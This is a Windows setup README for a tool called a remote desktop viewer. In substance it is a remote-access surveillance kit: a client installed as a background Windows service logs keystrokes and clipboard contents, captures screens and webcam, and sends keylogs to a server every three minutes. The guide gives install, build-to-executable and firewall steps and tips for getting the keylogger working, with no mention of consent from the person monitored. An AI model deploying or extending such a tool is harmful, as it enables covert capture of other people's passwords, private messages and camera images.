================================================================================
                    REMOTE DESKTOP VIEWER - WINDOWS SETUP
================================================================================

REQUIREMENTS:
- Windows 10 or higher
- Python 3.8+ (https://www.python.org/downloads/)
- Administrator privileges (for service installation)

================================================================================
INSTALLATION
================================================================================

1. Install Python
   - Download from https://www.python.org/downloads/
   - Run installer and CHECK "Add Python to PATH"
   - Verify: python --version

2. Install Dependencies
   cd D:\toolkit
   pip install -r requirements.txt

3. Generate Certificates (First time only)
   python certs\generate_certs.py

4. Verify Installation
   python verify_installation.py

================================================================================
RUNNING THE APPLICATION
================================================================================

METHOD 1: Direct Run (Testing)
-------------------------------
Terminal 1 (Server):
   python server\server.py --web --web-port 5000

Terminal 2 (Client):
   python client\client.py --server-host 127.0.0.1 --server-port 8443

Web Interface:
   Open browser: http://localhost:5000

METHOD 2: Two Machines
----------------------
Server Machine:
   1. Find IP: ipconfig (look for IPv4 Address, e.g., 192.168.1.100)
   2. Run: python server\server.py --web --web-port 5000

Client Machine:
   python client\client.py --server-host 192.168.1.100 --server-port 8443

METHOD 3: Build Executables
----------------------------
   build_windows.bat

   Output: dist\client.exe and dist\server.exe

METHOD 4: Windows Service
-------------------------
   1. Set server IP:
      setx RDS_SERVER_HOST "192.168.1.100"
      setx RDS_SERVER_PORT "8443"

   2. Close and reopen terminal

   3. Install service:
      python client\install_service.py install

   4. Start service:
      python client\install_service.py start

   5. Check status:
      python client\install_service.py status

   6. Stop service:
      python client\install_service.py stop

   7. Remove service:
      python client\install_service.py remove

================================================================================
FEATURES
================================================================================

Screen Capture:
- Captures all monitors at 10 FPS
- Displays at 20 FPS on server
- SSL/TLS encrypted

Keylogging:
- Saves to: keylogs\[ClientName]\[ClientName]_DD.MM.YYYY_HH.MM.SS.txt
- Captures clipboard on Ctrl+C/V
- Counts consecutive keys: [BackSpace - 10]
- Auto-sends every 3 minutes
- Format example:
  aaaa SSSS DDDDD [CapsLock - 8]
  [Enter]
  {clipboard} copied text here

Webcam:
- Click "Webcam" button in web interface
- Shows error if no webcam available

Client Control:
- Disable client: Check "Disable" box
- Buttons become inactive when disabled

================================================================================
CONFIGURATION
================================================================================

Edit config.py to change:
- CAPTURE_FPS = 10          # Screen capture rate
- SCREEN_QUALITY = 80       # JPEG quality (1-100)
- DEFAULT_SERVER_PORT = 8443
- KEYLOG_ENABLED = True

================================================================================
FIREWALL SETUP
================================================================================

Allow Python through firewall:
1. Windows Security → Firewall & network protection
2. Allow an app through firewall
3. Add Python to allowed apps (Private and Public)

Or allow port 8443:
1. Windows Security → Advanced settings
2. Inbound Rules → New Rule
3. Port → TCP → 8443
4. Allow connection

================================================================================
TROUBLESHOOTING
================================================================================

"Python is not recognized":
   - Reinstall Python and check "Add Python to PATH"

Connection fails:
   - Check Windows Firewall
   - Verify server IP: ping 192.168.1.100
   - Ensure server is running

High CPU usage:
   - Edit config.py: CAPTURE_FPS = 5
   - Edit config.py: SCREEN_QUALITY = 60

Service won't start:
   - Run as Administrator
   - Check environment variables are set
   - Verify: echo %RDS_SERVER_HOST%

Keylogger not working:
   - Run client as Administrator
   - Check: pip show pynput pyperclip

================================================================================
FILE LOCATIONS
================================================================================

Keylogs:     keylogs\[ClientName]\*.txt
Config:      config.py
Certs:       certs\*.crt, certs\*.key
Executables: dist\client.exe, dist\server.exe

================================================================================
SUPPORT
================================================================================

Check installation: python verify_installation.py
View logs: Check terminal output
